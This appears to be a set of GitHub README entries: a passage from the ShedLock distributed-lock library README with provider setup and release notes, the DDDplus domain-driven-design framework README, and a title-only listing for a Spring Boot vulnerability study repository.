Neo4jLockProvider lockProvider(org.neo4j.driver.Driver driver) {
    return new Neo4jLockProvider(driver);
}
```

Please make sure that the `neo4j-java-driver` version used by `shedlock-provider-neo4j` matches the driver version used in your project (if you use `spring-boot-starter-data-neo4j`, it is probably provided transitively).

#### Etcd
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-etcd-jetcd</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.etcd.jetcd.EtcdLockProvider;

...

@Bean
public LockProvider lockProvider(Client client) {
    return new EtcdLockProvider(client);
}
```

#### Apache Ignite
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-ignite</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure:

```java
import net.javacrumbs.shedlock.provider.ignite.IgniteLockProvider;

...

@Bean
public LockProvider lockProvider(Ignite ignite) {
    return new IgniteLockProvider(ignite);
}
```

#### In-Memory
If you want to use a lock provider in tests, there is an in-memory implementation.

Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-inmemory</artifactId>
    <version>5.13.0</version>
    <scope>test</scope>
</dependency>
```

```java
import net.javacrumbs.shedlock.provider.inmemory.InMemoryLockProvider;

...

@Bean
public LockProvider lockProvider() {
    return new InMemoryLockProvider();
}
```

#### Memcached (using spymemcached)
Please be aware that memcached is not a database but a cache. It means that if the cache is full, [the lock may be released prematurely](https://stackoverflow.com/questions/6868256/memcached-eviction-prior-to-key-expiry/10456364#10456364). **Use only if you know what you are doing.**

Import

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-memcached-spy</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.memcached.spy.MemcachedLockProvider;

...

@Bean
public LockProvider lockProvider(net.spy.memcached.MemcachedClient client) {
    return new MemcachedLockProvider(client, ENV);
}
```

P.S.: Memcached standard protocol:
- A key (an arbitrary string up to 250 bytes in length; no spaces or newlines for ASCII mode)
- An expiration time, in `seconds`. '0' means never expire. Can be up to 30 days. After 30 days, it is treated as a unix timestamp of an exact date. (Supports `seconds`, `minutes` and `days`, up to `30` days.)

#### Datastore
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-datastore</artifactId>
    <version>5.13.0</version>
</dependency>
```

and configure

```java
import net.javacrumbs.shedlock.provider.datastore.DatastoreLockProvider;

...

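// Locks are persisted via the injected Google Cloud Datastore client.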
@Bean
public LockProvider lockProvider(com.google.cloud.datastore.Datastore datastore) {
    return new DatastoreLockProvider(datastore);
}
```

#### Spanner
Import the project

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <artifactId>shedlock-provider-spanner</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure

```java
import net.javacrumbs.shedlock.provider.spanner.SpannerLockProvider;

...

// Basic
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
    return new SpannerLockProvider(databaseClientSupplier);
}

// Custom host, table and column names
@Bean
public LockProvider lockProvider(DatabaseClient databaseClient) {
    var config = SpannerLockProvider.Configuration.builder()
        .withDatabaseClient(databaseClientSupplier)
        .withTableConfiguration(SpannerLockProvider.TableConfiguration.builder()
            ... // Custom table and column names
            .build())
        .withHostName("customHostName")
        .build();

    return new SpannerLockProvider(config);
}
```

## Multi-tenancy
If you have a multi-tenancy use case, you can use a lock provider similar to this one (see the full [example](https://github.com/lukas-krecan/ShedLock/blob/master/providers/jdbc/shedlock-provider-jdbc-template/src/test/java/net/javacrumbs/shedlock/provider/jdbctemplate/MultiTenancyLockProviderIntegrationTest.java#L87))

```java
private static abstract class MultiTenancyLockProvider implements LockProvider {
    private final ConcurrentHashMap<String, LockProvider> providers = new ConcurrentHashMap<>();

    @Override
    public @NonNull Optional<SimpleLock> lock(@NonNull LockConfiguration lockConfiguration) {
        String tenantName = getTenantName(lockConfiguration);
        return providers.computeIfAbsent(tenantName, this::createLockProvider).lock(lockConfiguration);
    }

    protected abstract LockProvider createLockProvider(String tenantName);

    protected abstract String getTenantName(LockConfiguration lockConfiguration);
}
```

## Customization
You can customize the behavior of the library by implementing the `LockProvider` interface. Let's say you want to implement special behavior after a lock is obtained. You can do it like this:

```java
public class MyLockProvider implements LockProvider {
    private final LockProvider delegate;

    public MyLockProvider(LockProvider delegate) {
        this.delegate = delegate;
    }

    @Override
    public Optional<SimpleLock> lock(LockConfiguration lockConfiguration) {
        Optional<SimpleLock> lock = delegate.lock(lockConfiguration);
        if (lock.isPresent()) {
            // do something
        }
        return lock;
    }
}
```

## Duration specification
All the annotations where you need to specify a duration support the following formats

* duration+unit - `1s`, `5ms`, `5m`, `1d` (since 4.0.0)
* duration in ms - `100` (only Spring integration)
* ISO-8601 - `PT15M` (see the [Duration.parse()](https://docs.oracle.com/javase/8/docs/api/java/time/Duration.html#parse-java.lang.CharSequence-) documentation)

## Extending the lock
There are some use cases which require extending a currently held lock. You can use the LockExtender in the following way:

```java
LockExtender.extendActiveLock(Duration.ofMinutes(5), ZERO);
```

Please note that not all lock provider implementations support lock extension.

## KeepAliveLockProvider
There is also a KeepAliveLockProvider that is able to keep the lock alive by periodically extending it. It can be used by wrapping the original lock provider. My personal opinion is that it should be used only in special cases; it adds more complexity to the library and the flow is harder to reason about, so please use it moderately.

```java
@Bean
public LockProvider lockProvider(...) {
    return new KeepAliveLockProvider(new XyzProvider(...), scheduler);
}
```

KeepAliveLockProvider extends the lock in the middle of the lockAtMostFor interval. For example, if lockAtMostFor is 10 minutes, the lock is extended every 5 minutes for 10 minutes until the lock is released. Please note that the minimal lockAtMostFor time supported by this provider is 30s. The scheduler is used only for the lock extension; a single thread should be enough.

## Micronaut integration
Since version 4.0.0, it's possible to use the Micronaut framework for integration.

Import the project:

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <!-- Micronaut 3 -->
    <artifactId>shedlock-micronaut</artifactId>
    <!-- For Micronaut 4 use -->
    <!-- <artifactId>shedlock-micronaut4</artifactId> -->
    <version>5.13.0</version>
</dependency>
```

Configure the default lockAtMostFor value (application.yml):

```yaml
shedlock:
  defaults:
    lock-at-most-for: 1m
```

Configure the lock provider:

```java
@Singleton
public LockProvider lockProvider() {
    ... select and configure your lock provider
}
```

Configure the scheduled task:

```java
@Scheduled(fixedDelay = "1s")
@SchedulerLock(name = "myTask")
public void myTask() {
    assertLocked();
    ...
}
```

## CDI integration
Since version 5.0.0, it's possible to use CDI for integration (tested only with Quarkus).

Import the project:

```xml
<dependency>
    <groupId>net.javacrumbs.shedlock</groupId>
    <!-- use shedlock-cdi-vintage for Quarkus 2.x -->
    <artifactId>shedlock-cdi</artifactId>
    <version>5.13.0</version>
</dependency>
```

Configure the default lockAtMostFor value (application.properties):

```properties
shedlock.defaults.lock-at-most-for=PT30S
```

Configure the lock provider:

```java
@Produces
@Singleton
public LockProvider lockProvider() {
    ...
}
```

Configure the scheduled task:

```java
@Scheduled(every = "1s")
@SchedulerLock(name = "myTask")
public void myTask() {
    assertLocked();
    ...
}
```

The implementation only depends on `jakarta.enterprise.cdi-api` and `microprofile-config-api`, so it should be usable in other CDI compatible frameworks, but it has not been tested with anything else than Quarkus. (The vintage module is built on top of javax annotations, as Quarkus 2.x had not moved to the Jakarta EE namespace yet.) The support is minimalistic; for example, there is no support for expressions in the annotation parameters yet. If you need it, feel free to send a PR.

## Locking without a framework
It is possible to use ShedLock without a framework

```java
LockingTaskExecutor executor = new DefaultLockingTaskExecutor(lockProvider);

...

Instant lockAtMostUntil = Instant.now().plusSeconds(600);
executor.executeWithLock(runnable, new LockConfiguration("lockName", lockAtMostUntil));
```

## Extending the lock
Some lock providers support extension of the lock. For the time being, it requires manual lock manipulation, directly using `LockProvider` and calling the `extend` method on the `SimpleLock`.

## Modes of Spring integration
ShedLock supports two modes of Spring integration. One that uses an AOP proxy around the scheduled method (PROXY_METHOD) and one that proxies the TaskScheduler (PROXY_SCHEDULER).

#### Scheduled Method proxy
Since version 4.0.0, the default mode of Spring integration is an AOP proxy around the annotated method. The main advantage of this mode is that it plays well with other frameworks that want to somehow alter the default Spring scheduling mechanism. The disadvantage is that the lock is applied even if you call the method directly.
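For example, a minimal sketch (class and method names are illustrative) of this direct-call caveat:

```java
import net.javacrumbs.shedlock.spring.annotation.SchedulerLock;
import org.springframework.scheduling.annotation.Scheduled;
import org.springframework.stereotype.Component;

@Component
class ReportJobs {
    @Scheduled(cron = "0 0 * * * *")
    @SchedulerLock(name = "hourlyReport", lockAtMostFor = "30m")
    public void hourlyReport() {
        // do the work
    }
}

@Component
class ReportTrigger {
    private final ReportJobs jobs;

    ReportTrigger(ReportJobs jobs) {
        this.jobs = jobs;
    }

    void triggerManually() {
        // Because ReportJobs is proxied, this direct call is also guarded
        // by the "hourlyReport" lock, even though no scheduler is involved.
        jobs.hourlyReport();
    }
}
```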
If the method returns a value and the lock is held by another process, null or an empty Optional will be returned (primitive return types are not supported).

Final and non-public methods are not proxied, so you either have to make your scheduled methods public and non-final or use the TaskScheduler proxy.

![Method proxy sequenceDiagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/method_proxy.png)

#### TaskScheduler proxy
This mode wraps the Spring `TaskScheduler` in an AOP proxy. **This mode does not play well with instrumentation libraries** like OpenTelemetry that also wrap the TaskScheduler. Please only use it if you know what you are doing. It can be switched on like this (PROXY_SCHEDULER was the default mode before 4.0.0):

```java
@EnableSchedulerLock(interceptMode = PROXY_SCHEDULER)
```

If you do not specify your task scheduler, a default one is created for you. If you have special needs, just create a bean implementing the `TaskScheduler` interface and it will get wrapped into the AOP proxy automatically.

```java
@Bean
public TaskScheduler taskScheduler() {
    return new MySpecialTaskScheduler();
}
```

Alternatively, you can define a bean of type `ScheduledExecutorService` and it will automatically get used by the task scheduling mechanism.

![TaskScheduler proxy sequence diagram](https://github.com/lukas-krecan/ShedLock/raw/master/documentation/scheduler_proxy.png)

### Spring XML configuration
Spring XML configuration is not supported as of version 3.0.0. If you need it, please use version 2.6.0 or file an issue explaining why it is needed.

## Lock assert
To prevent misconfiguration errors, like AOP misconfiguration, a missing annotation etc., you can assert that the lock works by using LockAssert:

```java
@Scheduled(...)
@SchedulerLock(..)
public void scheduledTask() {
    // To assert that the lock is held (prevents misconfiguration errors)
    LockAssert.assertLocked();
    // do something
}
```

In unit tests you can switch off the assertion by calling `LockAssert.TestHelper.makeAllAssertsPass(true)` on the given thread (as in this [example](https://github.com/lukas-krecan/ShedLock/commit/e8d63b7c56644c4189e0a8b420d8581d6eae1443)).

## Kotlin gotchas
The library is tested with Kotlin and works fine. The only issue is Spring AOP, which does not work on final methods. If you use `@SchedulerLock` with the `@Component` annotation, everything should work since the Kotlin Spring compiler plugin will automatically 'open' the method for you. If the `@Component` annotation is not present, you have to open the method yourself. (See [this issue](https://github.com/lukas-krecan/ShedLock/issues/1268) for more details.)

## Caveats
Locks in ShedLock have an expiration time, which leads to the following possible issues.

1. If the task runs longer than `lockAtMostFor`, the task can be executed more than once
2. If the clock difference between two nodes is more than `lockAtLeastFor` or the minimal execution time, the task can be executed more than once.

## Troubleshooting
Help, ShedLock does not do what it's supposed to do!

1. Upgrade to the newest version
2. Use [LockAssert](https://github.com/lukas-krecan/ShedLock#lock-assert) to ensure that AOP is correctly configured.
   - If it does not work, please read about Spring AOP internals (for example [here](https://docs.spring.io/spring-framework/docs/current/reference/html/core.html#aop-proxying))
3. Check the storage. If you are using JDBC, check the ShedLock table. If it's empty, ShedLock is not properly configured. If there is more than one record with the same name, you are missing a primary key.
4. Use the ShedLock debug log. ShedLock logs interesting information on DEBUG level with the logger name `net.javacrumbs.shedlock`. It should help you to see what's going on.
5. For short-running tasks consider using `lockAtLeastFor`. If the tasks are short-running, they could be executed one after another; `lockAtLeastFor` can prevent it.

# Release notes
## 5.13.0 (2024-04-05)
* #1779 Ability to rethrow an unexpected exception in JdbcTemplateStorageAccessor
* Dependency updates

## 5.12.0 (2024-02-29)
* #1800 Enable lower case for database type when using usingDbTime()
* #1804 Startup error with Neo4j 5.17.0
* Dependency updates

## 4.47.0 (2024-03-01)
* #1800 Enable lower case for database type when using usingDbTime() (thanks @yuagu1)

## 5.11.0 (2024-02-13)
* #1753 Fix SpEL for methods with parameters
* Dependency updates

## 5.10.2 (2023-12-07)
* #1635 Fix makeAllAssertsPass locks only once
* Dependency updates

## 5.10.1 (2023-12-06)
* #1635 Fix makeAllAssertsPass(false) throws NoSuchElementException
* Dependency updates

## 5.10.0 (2023-11-07)
* SpannerLockProvider added (thanks @pXius)
* Dependency updates

## 5.9.1 (2023-10-19)
* QuarkusRedisLockProvider supports Redis 6.2 (thanks @ricardojlrufino)

## 5.9.0 (2023-10-15)
* Support Quarkus 2 Redis client (thanks @ricardojlrufino)
* Better handling of timeouts in ReactiveStreamsMongoLockProvider
* Dependency updates

## 5.8.0 (2023-09-15)
* Support for Micronaut 4
* Use Merge instead of Insert for Oracle #1528 (thanks @xmojsic)
* Dependency updates

## 5.7.0 (2023-08-25)
* JedisLockProvider supports extending (thanks @shotmk)
* Better behavior when locks are nested #1493

## 4.46.0 (2023-09-05)
* JedisLockProvider (version 3) supports extending (thanks @shotmk)

## 4.45.0 (2023-09-04)
* JedisLockProvider supports extending (thanks @shotmk)

## 5.6.0
* Ability to explicitly set the database product in JdbcTemplateLockProvider (thanks @metron2)
* Removed forgotten versions from the BOM
* Dependency updates

## 5.5.0 (2023-06-19)
* Datastore support (thanks @mmastika)
* Dependency updates

## 5.4.0 (2023-06-06)
* Handle [uncategorized SQL exceptions](https://github.com/lukas-krecan/ShedLock/pull/1442) (thanks @jaam)
* Dependency updates

## 5.3.0 (2023-05-13)
* Added shedlock-cdi module (supports the newest CDI version)
* Dependency updates

## 5.2.0 (2023-03-06)
* Uppercase in JdbcTemplateProvider (thanks @Ragin-LundF)
* Dependency updates

## 5.1.0 (2023-01-07)
* Added SpEL support to the @SchedulerLock name attribute (thanks @ipalbeniz)
* Dependency updates

## 5.0.1 (2022-12-10)
* Work around broken Spring 6 exception translation https://github.com/lukas-krecan/ShedLock/issues/1272

## 4.44.0 (2022-12-29)
* Insert ignore for MySQL https://github.com/lukas-krecan/ShedLock/commit/8a4ae7ad8103bb47f55d43bccf043ca261c24d7a

## 5.0.0 (2022-12-10)
* Requires JDK 17
* Tested with Spring 6 (Spring Boot 3)
* Micronaut updated to 3.x.x
* R2DBC 1.x.x (still sucks)
* Spring Data 3.x.x
* Rudimentary support for CDI (tested with Quarkus)
* New jOOQ lock provider
* SLF4J 2
* Deleted all deprecated code and support for old versions of libraries

## 4.43.0 (2022-12-04)
* Better logging in JdbcTemplateProvider
* Dependency updates

## 4.42.0 (2022-09-16)
* Deprecate old Couchbase lock provider
* Dependency updates

## 4.41.0 (2022-08-17)
* Couchbase collection support (thanks @mesuutt)
* Dependency updates

## 4.40.0 (2022-08-11)
* Fixed caching issues when the app is started but the DB does not exist yet (#1129)
* Dependency updates

## 4.39.0 (2022-07-26)
* Introduced the elasticsearch8 LockProvider and deprecated the original one (thanks @MarAra)
* Dependency updates

## 4.38.0 (2022-07-02)
* ReactiveRedisLockProvider added (thanks @ericwcc)
* Dependency updates

## 4.37.0 (2022-06-14)
* OpenSearch provider (thanks @Pinny3)
* Fix wrong reference to reactive Mongo in BOM #1048
* Dependency updates

## 4.36.0 (2022-05-28)
* shedlock-bom module added
* Dependency updates

## 4.35.0 (2022-05-16)
* Neo4j allows specifying the database (thanks @SergeyPlatonov)
* Dependency updates

## 4.34.0 (2022-04-09)
* Dropped support for Hazelcast <= 3 as it has an unfixed vulnerability
* Dropped support for Spring Data Redis 1 as it is not supported
* Dependency updates

## 4.33.0
* Memcached provider added (thanks @pinkhello)
* Dependency updates

## 4.32.0
* JDBC provider does not change the autocommit attribute
* Dependency updates

## 4.31.0
* Jedis 4 lock provider
* Dependency updates

## 4.30.0
* In-memory lock provider added (thanks @kkocel)
* Dependency updates

## 4.29.0
* R2DBC support added (thanks @sokomishalov)
* Library upgrades

## 4.28.0
* Neo4j lock provider added (thanks @thimmwork)
* Library upgrades

## 4.27.0
* Ability to set transaction isolation in JdbcTemplateLockProvider
* Library upgrades

## 4.26.0
* KeepAliveLockProvider introduced
* Library upgrades

## 4.25.0
* LockExtender added

## 4.24.0
* Support for Apache Ignite (thanks @wirtsleg)
* Library upgrades

## 4.23.0
* Ability to set serialConsistencyLevel in Cassandra (thanks @DebajitKumarPhukan)
* Introduced the shedlock-provider-jdbc-micronaut module (thanks @drmaas)

## 4.22.1
* Catching and logging Cassandra exceptions

## 4.22.0
* Support for a custom keyspace in the Cassandra provider

## 4.21.0
* Elastic unlock using IMMEDIATE refresh policy #422
* DB2 JDBC lock provider uses microseconds in DB time
* Various library upgrades

## 4.20.1
* Fixed DB JDBC server time #378

## 4.20.0
* Support for etcd (thanks @grofoli)

## 4.19.1
* Fixed devtools compatibility #368

## 4.19.0
* Support for enhanced configuration in the Cassandra provider (thanks @DebajitKumarPhukan)
* LockConfigurationExtractor exposed as a Spring bean #359
* Handle CannotSerializeTransactionException #364

## 4.18.0
* Fixed Consul support for tokens and added enhanced Consul configuration (thanks @DrWifey)

## 4.17.0
* Consul support for tokens

## 4.16.0
* Spring - EnableSchedulerLock.order param added to specify the AOP proxy order
* JDBC - Log unexpected exceptions at ERROR level
* Hazelcast upgraded to 4.1

## 4.15.1
* Fix session leak in Consul provider #340 (thanks @haraldpusch)

## 4.15.0
* ArangoDB lock provider added (thanks @patrick-birkle)

## 4.14.0
* Support for the Couchbase 3 driver (thanks @blitzenzzz)
* Removed forgotten configuration files from the micronaut package (thanks @drmaas)
* Shutdown hook for Consul (thanks @kaliy)

## 4.13.0
* Support for Consul (thanks @kaliy)
* Various dependencies updated
* Deprecated the default LockConfiguration constructor

## 4.12.0
* Lazy initialization of SqlStatementsSource #258

## 4.11.1
* MongoLockProvider uses mongodb-driver-sync
* Removed deprecated constructors from MongoLockProvider

## 4.10.1
* New Mongo reactive streams driver (thanks @codependent)

## 4.9.3
* Fixed JdbcTemplateLockProvider usingDbTime() locking #244 (thanks @gjorgievskivlatko)

## 4.9.2
* Do not fail in the DB type determining code if the DB connection is not available

## 4.9.1
* Support for server time in DB2
* Removed the shedlock-provider-jdbc-internal module

## 4.9.0
* Support for server time in JdbcTemplateLockProvider
* Using custom non-null annotations
* Trimming time precision to milliseconds
* Micronaut upgraded to 1.3.4
* Added automatic DB tests for Oracle, MariaDB and MS SQL.

## 4.8.0
* DynamoDB 2 module introduced (thanks Mark Egan)
* JDBC template code refactored to not log an error on failed insert in Postgres
* INSERT .. ON CONFLICT UPDATE is used for Postgres

## 4.7.1
* Make LockAssert.TestHelper public

## 4.7.0
* New module for Hazelcast 4
* Ability to switch off LockAssert in unit tests

## 4.6.0
* Support for meta annotations and annotation inheritance in Spring

## 4.5.2
* Made compatible with PostgreSQL JDBC Driver 42.2.11

## 4.5.1
* Inject redis template

## 4.5.0
* ClockProvider introduced
* MongoLockProvider(MongoDatabase) introduced

## 4.4.0
* Support for non-void returning methods when PROXY_METHOD interception is used

## 4.3.1
* Introduced shedlock-provider-redis-spring-1 to work around Spring Data Redis 1 issue #105 (thanks @rygh4775)

## 4.3.0
* Jedis dependency upgraded to 3.2.0
* Support for JedisCluster
* Tests upgraded to JUnit 5

## 4.2.0
* Cassandra provider (thanks @mitjag)

## 4.1.0
* More configuration options for JdbcTemplateProvider

## 4.0.4
* Allow configuration of the key prefix in RedisLockProvider #181 (thanks @krm1312)

## 4.0.3
* Fixed junit dependency scope #179

## 4.0.2
* Fix NPE caused by Redisson #178

## 4.0.1
* DefaultLockingTaskExecutor made reentrant #175

## 4.0.0
Version 4.0.0 is a major release changing quite a lot of stuff
* `net.javacrumbs.shedlock.core.SchedulerLock` has been replaced by `net.javacrumbs.shedlock.spring.annotation.SchedulerLock`. The original annotation was in the wrong module and was too complex. Please use the new annotation; the old one still works, but in a few years it will be removed.
* Default intercept mode changed from `PROXY_SCHEDULER` to `PROXY_METHOD`. The reason is that there were a lot of issues with `PROXY_SCHEDULER` (for example #168). You can still use `PROXY_SCHEDULER` mode if you specify it manually.
* Support for more readable [duration strings](#duration-specification)
* Support for lock assertion `LockAssert.assertLocked()`
* [Support for Micronaut](#micronaut-integration) added

## 3.0.1
* Fixed bean definition configuration #171

## 3.0.0
* `EnableSchedulerLock.mode` renamed to `interceptMode`
* Use standard Spring AOP configuration to honor the Spring Boot config (supports the `proxyTargetClass` flag)
* Removed deprecated SpringLockableTaskSchedulerFactoryBean and related classes
* Removed support for XML configuration

## 2.6.0
* Updated dependency to Spring 2.1.9
* Support for lock extensions (beta)

## 2.5.0
* Zookeeper supports *lockAtMostFor* and *lockAtLeastFor* params
* Better debug logging

## 2.4.0
* Fixed potential deadlock in Hazelcast (thanks @HubertTatar)
* Finding class-level annotations in proxy method mode (thanks @volkovs)
* ScheduledLockConfigurationBuilder deprecated

## 2.3.0
* LockProvider is initialized lazily so it does not change the DataSource initialization order

## 2.2.1
* MongoLockProvider accepts MongoCollection as a constructor param

## 2.2.0
* DynamoDBLockProvider added

## 2.1.0
* MongoLockProvider rewritten to use upsert
* ElasticsearchLockProvider added

## 2.0.1
* AOP proxy and annotation configuration support

## 1.3.0
* Can set a Timezone in the JdbcTemplateLock provider

## 1.2.0
* Support for Couchbase (thanks to @MoranVaisberg)

## 1.1.1
* Spring RedisLockProvider refactored to use RedisTemplate

## 1.1.0
* Support for transaction manager in JdbcTemplateLockProvider (thanks to @grmblfrz)

## 1.0.0
* Upgraded dependencies to Spring 5 and Spring Data 2
* Removed deprecated net.javacrumbs.shedlock.provider.jedis.JedisLockProvider (use net.javacrumbs.shedlock.provider.redis.jedis.JedisLockProvider instead)
* Removed deprecated SpringLockableTaskSchedulerFactory (use ScheduledLockConfigurationBuilder instead)

## 0.18.2
* Ability to clean the lock cache

## 0.18.1
* shedlock-provider-redis-spring made compatible with spring-data-redis 1.x.x

## 0.18.0
* Added shedlock-provider-redis-spring (thanks to @siposr)
* shedlock-provider-jedis moved to shedlock-provider-redis-jedis

## 0.17.0
* Support for SpEL in the lock name annotation

## 0.16.1
* Automatically closing TaskExecutor on Spring shutdown

## 0.16.0
* Removed spring-test from shedlock-spring compile time dependencies
* Added Automatic-Module-Names

## 0.15.1
* Hazelcast works with a remote cluster

## 0.15.0
* Fixed ScheduledLockConfigurationBuilder interfaces #32
* Hazelcast code refactoring

## 0.14.0
* Support for Hazelcast (thanks to @peyo)

## 0.13.0
* Jedis constructor made more generic (thanks to @mgrzeszczak)

## 0.12.0
* Support for property placeholders in annotation lockAtMostForString/lockAtLeastForString
* Support for composed annotations
* ScheduledLockConfigurationBuilder introduced (deprecating SpringLockableTaskSchedulerFactory)

## 0.11.0
* Support for Redis (thanks to @clamey)
* Checking that lockAtMostFor is in the future
* Checking that lockAtMostFor is larger than lockAtLeastFor

## 0.10.0
* jdbc-template-provider does not participate in the task transaction

## 0.9.0
* Support for @SchedulerLock annotations on proxied classes

## 0.8.0
* LockableTaskScheduler made AutoCloseable so it's closed upon Spring shutdown

## 0.7.0
* Support for lockAtLeastFor

## 0.6.0
* Possible to configure defaultLockFor time so it does not have to be repeated in every annotation

## 0.5.0
* ZooKeeper nodes created under /shedlock by default

## 0.4.1
* JdbcLockProvider insert does not fail on DataIntegrityViolationException

## 0.4.0
* Extracted LockingTaskExecutor
* LockManager.executeIfNotLocked renamed to executeWithLock
* Default table name in JDBC lock providers

## 0.3.0
* `@SchedulerLock.name` made obligatory
* `@SchedulerLock.lockForMillis` renamed to lockAtMostFor
* Adding plain JDBC LockProvider
* Adding ZooKeeper LockProvider
0
funkygao/cp-ddd-framework
A lightweight DDD forward/reverse business modeling framework that supports the architecture evolution of complex business systems!
architecture clean-architecture ddd ddd-architecture dddplus domain-driven-design enterprise-architecture extension framework modeling reverse-engineering
<h1 align="center">DDDplus</h1>

<div align="center">

A lightweight DDD (Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution!

[![CI](https://github.com/funkygao/cp-ddd-framework/workflows/CI/badge.svg?branch=master)](https://github.com/funkygao/cp-ddd-framework/actions?query=branch%3Amaster+workflow%3ACI)
[![Javadoc](https://img.shields.io/badge/javadoc-Reference-blue.svg)](https://funkygao.github.io/cp-ddd-framework/doc/apidocs/)
[![Maven Central](https://img.shields.io/maven-central/v/io.github.dddplus/dddplus.svg?label=Maven%20Central)](https://central.sonatype.com/namespace/io.github.dddplus)
![Requirement](https://img.shields.io/badge/JDK-8+-blue.svg)
[![Coverage Status](https://img.shields.io/codecov/c/github/funkygao/cp-ddd-framework.svg)](https://codecov.io/gh/funkygao/cp-ddd-framework)
[![Mentioned in Awesome DDD](https://awesome.re/mentioned-badge.svg)](https://github.com/heynickc/awesome-ddd#jvm)
[![Gitter chat](https://img.shields.io/badge/gitter-join%20chat%20%E2%86%92-brightgreen.svg)](https://gitter.im/cp-ddd-framework/community)

</div>

<div align="center">

Languages: English | [中文](README.zh-cn.md)

</div>

----

## What is DDDplus?

DDDplus, formerly named cp-ddd-framework (cp means Central Platform: 中台), is a lightweight DDD (Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution!

> It captures missing DDD concepts and patches the building blocks. It empowers building the domain model with forward and reverse modeling. It visualizes the complete domain knowledge from code. It connects frontline developers with architects, product managers, business stakeholders and the management team. It turns analysis, design, design review, implementation, code review and testing into a positive feedback closed loop. It strengthens building extension-oriented, flexible software solutions. It eliminates frequently encountered misunderstandings of DDD via thorough javadoc for each building block, with detailed examples.

In short, the 3 most essential `plus` are:

1. [patch](/dddplus-spec/src/main/java/io/github/dddplus/model) DDD building blocks for pragmatic forward modeling, clearing obstacles of DDD implementation
2. offer a reverse modeling [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl), visualizing complete domain knowledge from code
3. provide [extension point](/dddplus-spec/src/main/java/io/github/dddplus/ext) with multiple routing mechanisms, suited for complex business scenarios

## Current status

Used in several complex, critical central platform projects in production environments.

## Showcase

[A full demo of DDDplus forward/reverse modeling ->](dddplus-test/src/test/java/ddd/plus/showcase/README.md)

## Quickstart

### Forward modeling

```xml
<dependency>
    <groupId>io.github.dddplus</groupId>
    <artifactId>dddplus-runtime</artifactId>
</dependency>
```

#### Integration with SpringBoot

```java
@SpringBootApplication(scanBasePackages = {"${your base packages}", "io.github.dddplus"})
public class Application {
    public static void main(String[] args) {
        SpringApplication.run(Application.class);
    }
}
```

### Reverse Modeling

Please check out the [《step by step guide》](doc/ReverseModelingGuide.md).

```xml
<dependency>
    <groupId>io.github.dddplus</groupId>
    <artifactId>dddplus-spec</artifactId>
</dependency>
```

Annotate your code with the [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl); DDDplus will parse the AST and render the domain model in multiple views.
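As a minimal illustration (assuming the `@KeyElement`/`@KeyBehavior` style annotations from the DSL package linked above; the exact attributes may differ), annotating an aggregate might look like this:

```java
import io.github.dddplus.dsl.KeyBehavior;
import io.github.dddplus.dsl.KeyElement;

// An order aggregate annotated for reverse modeling: the marked field and
// behavior are what the maven plugin below extracts into the domain model.
public class Order {
    @KeyElement
    private String orderNo;

    @KeyBehavior
    public void cancel() {
        // domain logic
    }
}
```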
```bash
mvn io.github.dddplus:dddplus-maven-plugin:model \
    -DrootDir=${colon separated source code dirs} \
    -DplantUml=${target business model in svg format} \
    -DtextModel=${target business model in txt format}
```

### Architecture Guard

```bash
mvn io.github.dddplus:dddplus-maven-plugin:enforce \
    -DrootPackage={your pkg} \
    -DrootDir={your src dir}
```

## Known Issues

- reverse modeling assumes unique class names within a code repo

## Contribution

You are welcome to contribute to the project with pull requests on GitHub. If you find a bug or want to request a feature, please use the [Issue Tracker](https://github.com/funkygao/cp-ddd-framework/issues). For any question, you can use [Gitter Chat](https://gitter.im/cp-ddd-framework/community) to ask.

## Licensing

DDDplus is licensed under the Apache License, Version 2.0 (the "License"); you may not use this project except in compliance with the License. You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0).
0
LandGrey/SpringBootVulExploit
A collection of study materials, exploitation methods and tricks for Spring Boot related vulnerabilities; a check list for black-box security assessments
rce spring-actuator-vulnerability spring-boot-vulnerability spring-vulnerability springboot springboot-actuator-rce springcloud vulnerability
